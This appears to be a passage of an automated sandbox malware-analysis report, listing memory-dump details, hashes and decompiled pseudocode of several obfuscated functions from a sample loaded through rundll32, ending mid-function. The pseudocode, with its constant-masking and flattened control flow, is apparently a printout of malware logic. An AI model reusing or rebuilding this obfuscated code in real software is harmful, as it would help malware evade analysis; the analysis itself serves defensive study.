                                                                                                                      0x002b9112
                                                                                                                      0x002b9119

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: b!o$rL*$t
                                                                                                                      • API String ID: 0-1909624753
                                                                                                                      • Opcode ID: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction ID: c0ffaabf7921ed332434e5b2ea986fecc7b32633f74491f1bd7510f7fba6ff7d
                                                                                                                      • Opcode Fuzzy Hash: 08792196a01ec6f0438129d1e16b46a7bb7c069241e3f29c323c54d08d570b65
                                                                                                                      • Instruction Fuzzy Hash: 39B1DC7141038D9BDF59CF61C98A9CE3BA1FF44348F108219FE1A96260D7B5C9A9CF84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002BB41A Relevance: 3.9, Strings: 3, Instructions: 155COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E002BB41A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				void* _t125;
				void* _t136;
				intOrPtr _t140;
				void* _t146;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t163;
				signed int* _t166;

				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(1);
				_push(__ecx);
				E002BCF25(_t125);
				_v56 = 0xe46139;
				_t166 =  &(( &_v60)[7]);
				_v56 = _v56 + 0x2728;
				_v56 = _v56 ^ 0xfa290e75;
				_t163 = 0;
				_v56 = _v56 >> 4;
				_t146 = 0x6cc7f8c;
				_v56 = _v56 ^ 0x0fa05392;
				_v60 = 0xdd8405;
				_v60 = _v60 + 0xffff7544;
				_t159 = 0x13;
				_v60 = _v60 / _t159;
				_t160 = 0x4a;
				_v60 = _v60 * 0x44;
				_v60 = _v60 ^ 0x03147b15;
				_v40 = 0xb1f638;
				_v40 = _v40 / _t160;
				_v40 = _v40 + 0xfdde;
				_v40 = _v40 ^ 0x000bffc0;
				_v20 = 0xc1e326;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x0f1113ff;
				_v24 = 0x9dff8e;
				_v24 = _v24 << 5;
				_v24 = _v24 ^ 0x13be58e4;
				_v44 = 0x26f48e;
				_v44 = _v44 >> 3;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x0002f448;
				_v48 = 0xa078f9;
				_t161 = 0x1c;
				_v48 = _v48 * 0xe;
				_v48 = _v48 ^ 0x04e4b6a4;
				_v48 = _v48 ^ 0x0c2dbe80;
				_v52 = 0xb739f4;
				_v52 = _v52 ^ 0x18b1fcfd;
				_v52 = _v52 ^ 0x2d0276e6;
				_v52 = _v52 ^ 0x3502a25a;
				_v28 = 0x1e50a5;
				_v28 = _v28 / _t161;
				_v28 = _v28 ^ 0x0008472d;
				_v32 = 0x99faaf;
				_v32 = _v32 + 0xfffffde3;
				_v32 = _v32 ^ 0x0091a9c4;
				_v36 = 0x23e8f3;
				_v36 = _v36 >> 1;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x064f5444;
				_v8 = 0xf9c016;
				_v8 = _v8 | 0x76d0de1d;
				_v8 = _v8 ^ 0x76f7039e;
				_v12 = 0x650156;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x000fa496;
				_v16 = 0x5361c2;
				_v16 = _v16 ^ 0x712c2ae6;
				_v16 = _v16 ^ 0x71790bc8;
				_t162 = _v4;
				do {
					while(_t146 != 0x2367fc3) {
						if(_t146 == 0x555e5ab) {
							E002D13B1(_v4, _v44, _v48, _v52, 1, _a8, 1, _t146, _v28, _v32, _a4);
							_t166 =  &(_t166[9]);
							_t146 = 0xbed5482;
							_t163 =  !=  ? 1 : _t163;
							continue;
						} else {
							if(_t146 == 0x6cc7f8c) {
								_t146 = 0x9230dbb;
								continue;
							} else {
								if(_t146 == 0x9230dbb) {
									_t140 = E002B9685(_t146);
									_t162 = _t140;
									if(_t140 != 0xffffffff) {
										_t146 = 0x2367fc3;
										continue;
									}
								} else {
									if(_t146 != 0xbed5482) {
										goto L15;
									} else {
										E002C4DAD(_v36, _v8, _v4, _v12, _v16);
									}
								}
							}
						}
						L7:
						return _t163;
					}
					_t136 = E002CFB2B(_v40,  &_v4, _v20, _v24, _t162);
					_t166 =  &(_t166[3]);
					if(_t136 == 0) {
						_t146 = 0x362db31;
						goto L15;
					} else {
						_t146 = 0x555e5ab;
						continue;
					}
					goto L7;
					L15:
				} while (_t146 != 0x362db31);
				goto L7;
			}



























                                                                                                                      0x002bb424
                                                                                                                      0x002bb425
                                                                                                                      0x002bb429
                                                                                                                      0x002bb42d
                                                                                                                      0x002bb431
                                                                                                                      0x002bb435
                                                                                                                      0x002bb436
                                                                                                                      0x002bb437
                                                                                                                      0x002bb43c
                                                                                                                      0x002bb444
                                                                                                                      0x002bb447
                                                                                                                      0x002bb451
                                                                                                                      0x002bb459
                                                                                                                      0x002bb45b
                                                                                                                      0x002bb460
                                                                                                                      0x002bb465
                                                                                                                      0x002bb46d
                                                                                                                      0x002bb475
                                                                                                                      0x002bb483
                                                                                                                      0x002bb488
                                                                                                                      0x002bb493
                                                                                                                      0x002bb496
                                                                                                                      0x002bb49a
                                                                                                                      0x002bb4a2
                                                                                                                      0x002bb4b2
                                                                                                                      0x002bb4b6
                                                                                                                      0x002bb4be
                                                                                                                      0x002bb4c6
                                                                                                                      0x002bb4ce
                                                                                                                      0x002bb4d3
                                                                                                                      0x002bb4db
                                                                                                                      0x002bb4e3
                                                                                                                      0x002bb4e8
                                                                                                                      0x002bb4f0
                                                                                                                      0x002bb4f8
                                                                                                                      0x002bb4fd
                                                                                                                      0x002bb502
                                                                                                                      0x002bb50a
                                                                                                                      0x002bb517
                                                                                                                      0x002bb518
                                                                                                                      0x002bb51c
                                                                                                                      0x002bb524
                                                                                                                      0x002bb52c
                                                                                                                      0x002bb534
                                                                                                                      0x002bb53c
                                                                                                                      0x002bb544
                                                                                                                      0x002bb54c
                                                                                                                      0x002bb55a
                                                                                                                      0x002bb55e
                                                                                                                      0x002bb566
                                                                                                                      0x002bb56e
                                                                                                                      0x002bb576
                                                                                                                      0x002bb57e
                                                                                                                      0x002bb586
                                                                                                                      0x002bb58f
                                                                                                                      0x002bb593
                                                                                                                      0x002bb59b
                                                                                                                      0x002bb5a3
                                                                                                                      0x002bb5ab
                                                                                                                      0x002bb5b3
                                                                                                                      0x002bb5bb
                                                                                                                      0x002bb5c5
                                                                                                                      0x002bb5cd
                                                                                                                      0x002bb5d5
                                                                                                                      0x002bb5dd
                                                                                                                      0x002bb5e5
                                                                                                                      0x002bb5e9
                                                                                                                      0x002bb5e9
                                                                                                                      0x002bb5f7
                                                                                                                      0x002bb67d
                                                                                                                      0x002bb682
                                                                                                                      0x002bb685
                                                                                                                      0x002bb68c
                                                                                                                      0x00000000
                                                                                                                      0x002bb5f9
                                                                                                                      0x002bb5ff
                                                                                                                      0x002bb653
                                                                                                                      0x00000000
                                                                                                                      0x002bb601
                                                                                                                      0x002bb607
                                                                                                                      0x002bb643
                                                                                                                      0x002bb648
                                                                                                                      0x002bb64d
                                                                                                                      0x002bb64f
                                                                                                                      0x00000000
                                                                                                                      0x002bb64f
                                                                                                                      0x002bb609
                                                                                                                      0x002bb60f
                                                                                                                      0x00000000
                                                                                                                      0x002bb615
                                                                                                                      0x002bb629
                                                                                                                      0x002bb62e
                                                                                                                      0x002bb60f
                                                                                                                      0x002bb607
                                                                                                                      0x002bb5ff
                                                                                                                      0x002bb632
                                                                                                                      0x002bb63a
                                                                                                                      0x002bb63a
                                                                                                                      0x002bb6a5
                                                                                                                      0x002bb6aa
                                                                                                                      0x002bb6af
                                                                                                                      0x002bb6bb
                                                                                                                      0x00000000
                                                                                                                      0x002bb6b1
                                                                                                                      0x002bb6b1
                                                                                                                      0x00000000
                                                                                                                      0x002bb6b1
                                                                                                                      0x00000000
                                                                                                                      0x002bb6c0
                                                                                                                      0x002bb6c0
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ('$9a$*,q
                                                                                                                      • API String ID: 0-3312093510
                                                                                                                      • Opcode ID: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction ID: d1eae52bac0f10d12ab35e804e1395866176299c371f6c876f33e29fdd7f579e
                                                                                                                      • Opcode Fuzzy Hash: 91551d8a3a33aa242dcb579ab556c5323ead86a65d26f531dae9fc8f6b11891c
                                                                                                                      • Instruction Fuzzy Hash: 586142711183419FC759CF21998A82FBBE6FBC4398F544A1DF59296260C3B1CA68CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CC38F Relevance: 3.9, Strings: 3, Instructions: 155COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E002CC38F(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t139;
				void* _t153;
				signed int _t154;
				void* _t157;
				void* _t169;
				signed int _t170;
				signed int _t171;
				void* _t173;
				signed int* _t175;

				_t155 = _a4;
				_push(_a8);
				_t173 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t139);
				_v8 = _v8 & 0x00000000;
				_t175 =  &(( &_v80)[4]);
				_v4 = _v4 & 0x00000000;
				_v16 = 0x6f933c;
				_t169 = 0;
				_v12 = 0xacafca;
				_t157 = 0x2c6486;
				_v40 = 0xf6c939;
				_t170 = 0xb;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x00166f60;
				_v36 = 0x3062f8;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0x60c5f010;
				_v56 = 0xc1f429;
				_v56 = _v56 << 9;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x5f429000;
				_v80 = 0x6a6c05;
				_v80 = _v80 | 0xf56e7669;
				_t171 = 0x32;
				_v80 = _v80 * 0x6f;
				_v80 = _v80 + 0xffff851e;
				_v80 = _v80 ^ 0x6ae37c08;
				_v60 = 0x567c0c;
				_v60 = _v60 + 0xd503;
				_v60 = _v60 * 0x3a;
				_v60 = _v60 ^ 0x13c3775e;
				_v64 = 0x59a2ac;
				_v64 = _v64 | 0x5ac15ac1;
				_v64 = _v64 ^ 0x94d4ce27;
				_v64 = _v64 ^ 0xce05e559;
				_v44 = 0x50d454;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0x2175139d;
				_v48 = 0x5a75fb;
				_v48 = _v48 * 0x57;
				_v48 = _v48 ^ 0x1eb14dac;
				_v24 = 0x99b258;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x099f4f84;
				_v76 = 0x853d43;
				_v76 = _v76 >> 1;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 | 0x5f7f2022;
				_v76 = _v76 ^ 0x5f753756;
				_v28 = 0xded29;
				_v28 = _v28 | 0xc4be8170;
				_v28 = _v28 ^ 0xc4b8b15a;
				_v32 = 0x545bb5;
				_v32 = _v32 + 0xe4b1;
				_v32 = _v32 ^ 0x005c5734;
				_v68 = 0xaed47d;
				_v68 = _v68 << 0xf;
				_v68 = _v68 | 0x1d211fc5;
				_v68 = _v68 / _t171;
				_v68 = _v68 ^ 0x02801ca0;
				_v52 = 0x7d6e82;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 * 0x56;
				_v52 = _v52 ^ 0x0007d38d;
				_v72 = 0xcd2745;
				_v72 = _v72 ^ 0xed8bacb0;
				_v72 = _v72 + 0xffffdf8c;
				_v72 = _v72 | 0xe372d41f;
				_v72 = _v72 ^ 0xef7557f2;
				_v20 = 0x88cfe7;
				_v20 = _v20 >> 0xe;
				_v20 = _v20 ^ 0x0008c4a6;
				_t172 = _v20;
				while(_t157 != 0x2c6486) {
					if(_t157 == 0x2a600e7) {
						E002C4DAD(_v68, _v52, _t172, _v72, _v20);
					} else {
						if(_t157 == 0xbcc0c39) {
							_t153 = E002BEEB8(_v24, _v76, _t172,  *((intOrPtr*)(_t155 + 4)), _t157, _t155 + 4, _v28, _v32,  *_t155);
							_t175 =  &(_t175[7]);
							_t169 = _t153;
							_t157 = 0x2a600e7;
							continue;
						} else {
							if(_t157 != 0xd3b3a19) {
								L9:
								if(_t157 != 0xb00d47) {
									continue;
								} else {
								}
							} else {
								_t154 = E002CE938(_v36, _v56, _v80, _v60, _v40, _t157, _v64, _v44, _t157, _v48, 0, _t173);
								_t172 = _t154;
								_t175 =  &(_t175[0xa]);
								if(_t154 != 0xffffffff) {
									_t157 = 0xbcc0c39;
									continue;
								}
							}
						}
					}
					return _t169;
				}
				_t157 = 0xd3b3a19;
				goto L9;
			}
































                                                                                                                      0x002cc393
                                                                                                                      0x002cc39a
                                                                                                                      0x002cc39e
                                                                                                                      0x002cc3a0
                                                                                                                      0x002cc3a1
                                                                                                                      0x002cc3a2
                                                                                                                      0x002cc3a3
                                                                                                                      0x002cc3a8
                                                                                                                      0x002cc3ad
                                                                                                                      0x002cc3b0
                                                                                                                      0x002cc3b7
                                                                                                                      0x002cc3bf
                                                                                                                      0x002cc3c1
                                                                                                                      0x002cc3c9
                                                                                                                      0x002cc3ce
                                                                                                                      0x002cc3dc
                                                                                                                      0x002cc3e1
                                                                                                                      0x002cc3e7
                                                                                                                      0x002cc3ef
                                                                                                                      0x002cc3f7
                                                                                                                      0x002cc3fc
                                                                                                                      0x002cc404
                                                                                                                      0x002cc40c
                                                                                                                      0x002cc411
                                                                                                                      0x002cc416
                                                                                                                      0x002cc41e
                                                                                                                      0x002cc426
                                                                                                                      0x002cc433
                                                                                                                      0x002cc434
                                                                                                                      0x002cc438
                                                                                                                      0x002cc440
                                                                                                                      0x002cc448
                                                                                                                      0x002cc450
                                                                                                                      0x002cc45d
                                                                                                                      0x002cc461
                                                                                                                      0x002cc469
                                                                                                                      0x002cc471
                                                                                                                      0x002cc479
                                                                                                                      0x002cc481
                                                                                                                      0x002cc489
                                                                                                                      0x002cc496
                                                                                                                      0x002cc49a
                                                                                                                      0x002cc4a2
                                                                                                                      0x002cc4af
                                                                                                                      0x002cc4b3
                                                                                                                      0x002cc4bb
                                                                                                                      0x002cc4c3
                                                                                                                      0x002cc4c8
                                                                                                                      0x002cc4d0
                                                                                                                      0x002cc4d8
                                                                                                                      0x002cc4dc
                                                                                                                      0x002cc4e1
                                                                                                                      0x002cc4e9
                                                                                                                      0x002cc4f1
                                                                                                                      0x002cc4f9
                                                                                                                      0x002cc501
                                                                                                                      0x002cc509
                                                                                                                      0x002cc511
                                                                                                                      0x002cc519
                                                                                                                      0x002cc521
                                                                                                                      0x002cc529
                                                                                                                      0x002cc52e
                                                                                                                      0x002cc53c
                                                                                                                      0x002cc540
                                                                                                                      0x002cc548
                                                                                                                      0x002cc550
                                                                                                                      0x002cc55a
                                                                                                                      0x002cc55e
                                                                                                                      0x002cc566
                                                                                                                      0x002cc56e
                                                                                                                      0x002cc576
                                                                                                                      0x002cc57e
                                                                                                                      0x002cc586
                                                                                                                      0x002cc58e
                                                                                                                      0x002cc596
                                                                                                                      0x002cc59b
                                                                                                                      0x002cc5a3
                                                                                                                      0x002cc5a7
                                                                                                                      0x002cc5b9
                                                                                                                      0x002cc65c
                                                                                                                      0x002cc5bf
                                                                                                                      0x002cc5c5
                                                                                                                      0x002cc624
                                                                                                                      0x002cc629
                                                                                                                      0x002cc62c
                                                                                                                      0x002cc62e
                                                                                                                      0x00000000
                                                                                                                      0x002cc5c7
                                                                                                                      0x002cc5cd
                                                                                                                      0x002cc63d
                                                                                                                      0x002cc643
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002cc649
                                                                                                                      0x002cc5cf
                                                                                                                      0x002cc5f4
                                                                                                                      0x002cc5f9
                                                                                                                      0x002cc5fb
                                                                                                                      0x002cc601
                                                                                                                      0x002cc603
                                                                                                                      0x00000000
                                                                                                                      0x002cc603
                                                                                                                      0x002cc601
                                                                                                                      0x002cc5cd
                                                                                                                      0x002cc5c5
                                                                                                                      0x002cc66d
                                                                                                                      0x002cc66d
                                                                                                                      0x002cc638
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$4W\$V7u_
                                                                                                                      • API String ID: 0-1304481894
                                                                                                                      • Opcode ID: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction ID: 00dc27696512f4f0e138ca409e2937f0c752a9da739576e973586253dd97ed6b
                                                                                                                      • Opcode Fuzzy Hash: 7d0e0d148a11cd35a0702ef9378e6d2ffe14927d1b48726e3f76aff6e6edbe8e
                                                                                                                      • Instruction Fuzzy Hash: B4710E710193419FC758CF61C54A91BBBF1FBC5B58F504A0DF2AA9A260D3B28A19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002D04DE Relevance: 3.9, Strings: 3, Instructions: 136COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E002D04DE(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t114;
				void* _t125;
				void* _t128;
				signed int _t132;
				void* _t135;
				void* _t148;
				signed int* _t151;

				_push(_a12);
				_t147 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t114);
				_v60 = 0xcc4817;
				_t151 =  &(( &_v96)[5]);
				_v60 = _v60 << 8;
				_v60 = _v60 ^ 0xcc47e657;
				_t148 = 0;
				_v68 = 0xe0ed25;
				_t135 = 0xdcadf3a;
				_v68 = _v68 | 0xce8f6412;
				_v68 = _v68 ^ 0xf3afd128;
				_v68 = _v68 ^ 0x3d42c27e;
				_v72 = 0x9a5a35;
				_v72 = _v72 >> 7;
				_t132 = 0x47;
				_v72 = _v72 * 0x61;
				_v72 = _v72 ^ 0x007dafa6;
				_v76 = 0x100281;
				_v76 = _v76 + 0xffff4995;
				_v76 = _v76 ^ 0x3bbc9aa1;
				_v76 = _v76 ^ 0x3bbd0b56;
				_v84 = 0xc6f502;
				_v84 = _v84 / _t132;
				_v84 = _v84 >> 1;
				_v84 = _v84 | 0x31db5564;
				_v84 = _v84 ^ 0x31df2935;
				_v88 = 0xec4ee3;
				_t44 =  &_v88; // 0xec4ee3
				_v88 =  *_t44 * 0x67;
				_v88 = _v88 >> 3;
				_v88 = _v88 | 0x81ddbea1;
				_v88 = _v88 ^ 0x8bf24dda;
				_v92 = 0xa20219;
				_v92 = _v92 + 0x973c;
				_v92 = _v92 | 0xc6adcdd8;
				_v92 = _v92 << 0xa;
				_v92 = _v92 ^ 0xbf7a6030;
				_v96 = 0x474fb;
				_v96 = _v96 + 0x4e06;
				_v96 = _v96 * 0x4d;
				_v96 = _v96 ^ 0xb0fe0c99;
				_v96 = _v96 ^ 0xb19d06b7;
				_v52 = 0x7e1eaf;
				_v52 = _v52 ^ 0x3657a741;
				_v52 = _v52 ^ 0x362fc7d5;
				_v80 = 0x982156;
				_v80 = _v80 >> 1;
				_v80 = _v80 * 0x77;
				_v80 = _v80 * 0x51;
				_v80 = _v80 ^ 0x3002d3c9;
				_v56 = 0xfe8a73;
				_v56 = _v56 | 0x35e06d03;
				_v56 = _v56 ^ 0x35fae637;
				_v64 = 0x133817;
				_v64 = _v64 | 0xd744828f;
				_v64 = _v64 + 0x2427;
				_v64 = _v64 ^ 0xd75b1468;
				do {
					while(_t135 != 0x54f2717) {
						if(_t135 == 0x5ba048a) {
							_t128 = E002CB9B1(_v84, _v88, __eflags, _t147 + 0x34, _v92,  &_v48, _v96);
							_t151 =  &(_t151[4]);
							__eflags = _t128;
							if(__eflags != 0) {
								_t135 = 0x54f2717;
								continue;
							}
						} else {
							if(_t135 == 0xb11095c) {
								E002C64C5(_v60, _v68, _v72, _v76, _a4,  &_v48);
								_t151 =  &(_t151[4]);
								_t135 = 0x5ba048a;
								continue;
							} else {
								if(_t135 != 0xdcadf3a) {
									goto L10;
								} else {
									_t135 = 0xb11095c;
									continue;
								}
							}
						}
						goto L11;
					}
					_t125 = E002CB9B1(_v52, _v80, __eflags, _t147 + 0x10, _v56,  &_v48, _v64);
					_t151 =  &(_t151[4]);
					__eflags = _t125;
					_t148 =  !=  ? 1 : _t148;
					_t135 = 0xe1bb211;
					L10:
					__eflags = _t135 - 0xe1bb211;
				} while (__eflags != 0);
				L11:
				return _t148;
			}























                                                                                                                      0x002d04e5
                                                                                                                      0x002d04e9
                                                                                                                      0x002d04ed
                                                                                                                      0x002d04ee
                                                                                                                      0x002d04f2
                                                                                                                      0x002d04f3
                                                                                                                      0x002d04f4
                                                                                                                      0x002d04f9
                                                                                                                      0x002d0501
                                                                                                                      0x002d0504
                                                                                                                      0x002d050b
                                                                                                                      0x002d0513
                                                                                                                      0x002d0515
                                                                                                                      0x002d051d
                                                                                                                      0x002d0522
                                                                                                                      0x002d052f
                                                                                                                      0x002d0537
                                                                                                                      0x002d053f
                                                                                                                      0x002d0547
                                                                                                                      0x002d0553
                                                                                                                      0x002d0554
                                                                                                                      0x002d0558
                                                                                                                      0x002d0560
                                                                                                                      0x002d0568
                                                                                                                      0x002d0570
                                                                                                                      0x002d0578
                                                                                                                      0x002d0580
                                                                                                                      0x002d0593
                                                                                                                      0x002d0597
                                                                                                                      0x002d059b
                                                                                                                      0x002d05a3
                                                                                                                      0x002d05ab
                                                                                                                      0x002d05b3
                                                                                                                      0x002d05b8
                                                                                                                      0x002d05bc
                                                                                                                      0x002d05c1
                                                                                                                      0x002d05c9
                                                                                                                      0x002d05d1
                                                                                                                      0x002d05d9
                                                                                                                      0x002d05e1
                                                                                                                      0x002d05e9
                                                                                                                      0x002d05ee
                                                                                                                      0x002d05f6
                                                                                                                      0x002d05fe
                                                                                                                      0x002d060b
                                                                                                                      0x002d060f
                                                                                                                      0x002d0617
                                                                                                                      0x002d061f
                                                                                                                      0x002d0627
                                                                                                                      0x002d062f
                                                                                                                      0x002d0637
                                                                                                                      0x002d063f
                                                                                                                      0x002d0648
                                                                                                                      0x002d0651
                                                                                                                      0x002d0655
                                                                                                                      0x002d065d
                                                                                                                      0x002d0665
                                                                                                                      0x002d066d
                                                                                                                      0x002d0675
                                                                                                                      0x002d067d
                                                                                                                      0x002d0685
                                                                                                                      0x002d068d
                                                                                                                      0x002d0695
                                                                                                                      0x002d0695
                                                                                                                      0x002d069f
                                                                                                                      0x002d06f6
                                                                                                                      0x002d06fb
                                                                                                                      0x002d06fe
                                                                                                                      0x002d0700
                                                                                                                      0x002d0702
                                                                                                                      0x00000000
                                                                                                                      0x002d0702
                                                                                                                      0x002d06a1
                                                                                                                      0x002d06a3
                                                                                                                      0x002d06ce
                                                                                                                      0x002d06d3
                                                                                                                      0x002d06d6
                                                                                                                      0x00000000
                                                                                                                      0x002d06a5
                                                                                                                      0x002d06ab
                                                                                                                      0x00000000
                                                                                                                      0x002d06b1
                                                                                                                      0x002d06b1
                                                                                                                      0x00000000
                                                                                                                      0x002d06b1
                                                                                                                      0x002d06ab
                                                                                                                      0x002d06a3
                                                                                                                      0x00000000
                                                                                                                      0x002d069f
                                                                                                                      0x002d071f
                                                                                                                      0x002d0726
                                                                                                                      0x002d072a
                                                                                                                      0x002d072c
                                                                                                                      0x002d072f
                                                                                                                      0x002d0734
                                                                                                                      0x002d0734
                                                                                                                      0x002d0734
                                                                                                                      0x002d0741
                                                                                                                      0x002d0749

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %$'$$N
                                                                                                                      • API String ID: 0-2135679241
                                                                                                                      • Opcode ID: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction ID: 70bab9cb94167b8b0417bf04a31e5c84622226eff4e6d1759f0f5687bcb2bb83
                                                                                                                      • Opcode Fuzzy Hash: 97615591f5f084c9a38ef9eec9de6edeef0eef2f1fdc60eea6539c0a4db16790
                                                                                                                      • Instruction Fuzzy Hash: 405132B15083829FD758CF21C58681BBBF4FBD8348F505A1EF5A696220D3B1DA598F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002C026B Relevance: 3.9, Strings: 3, Instructions: 134COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E002C026B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				void* _t108;
				void* _t117;
				void* _t124;
				void* _t126;
				void* _t141;
				signed int _t142;
				signed int _t143;
				signed int* _t146;

				_push(_a12);
				_t140 = _a4;
				_t124 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t108);
				_v92 = 0x51c9e1;
				_t146 =  &(( &_v96)[5]);
				_v92 = _v92 << 4;
				_t141 = 0;
				_t126 = 0x4bb83f6;
				_t142 = 0x49;
				_v92 = _v92 * 0x6e;
				_v92 = _v92 + 0x829d;
				_v92 = _v92 ^ 0x32495c11;
				_v68 = 0x73c01f;
				_v68 = _v68 + 0x1dcd;
				_v68 = _v68 ^ 0x00720d8f;
				_v96 = 0xb49fc9;
				_v96 = _v96 + 0x43a3;
				_v96 = _v96 ^ 0x15acb626;
				_v96 = _v96 << 0x10;
				_v96 = _v96 ^ 0x554d7300;
				_v84 = 0x939dbf;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 / _t142;
				_v84 = _v84 ^ 0x000cd20a;
				_v60 = 0xb12a06;
				_v60 = _v60 | 0x23fd9b15;
				_v60 = _v60 ^ 0x23fc0752;
				_v76 = 0x2839ff;
				_v76 = _v76 + 0xfffff40d;
				_v76 = _v76 << 4;
				_v76 = _v76 ^ 0x0280e51a;
				_v80 = 0xa0e526;
				_v80 = _v80 | 0xbc5e80d8;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x017df397;
				_v64 = 0xa3347;
				_t143 = 0x14;
				_v64 = _v64 * 0x36;
				_v64 = _v64 ^ 0x02285917;
				_v88 = 0x8f496e;
				_v88 = _v88 + 0x138c;
